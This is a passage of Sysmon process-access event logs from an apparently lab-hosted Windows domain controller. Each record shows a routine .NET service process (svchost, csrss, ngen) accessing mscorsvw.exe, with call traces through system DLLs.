05:58:44.074","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-001040EF0E00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.090\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010C2030D00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.090","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010C2030D00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.090\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010C2030D00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.090","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010C2030D00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.105\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-0010A5F20E00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.105","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-0010A5F20E00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.168\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.168","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.168\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.168","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.199\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.199","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KE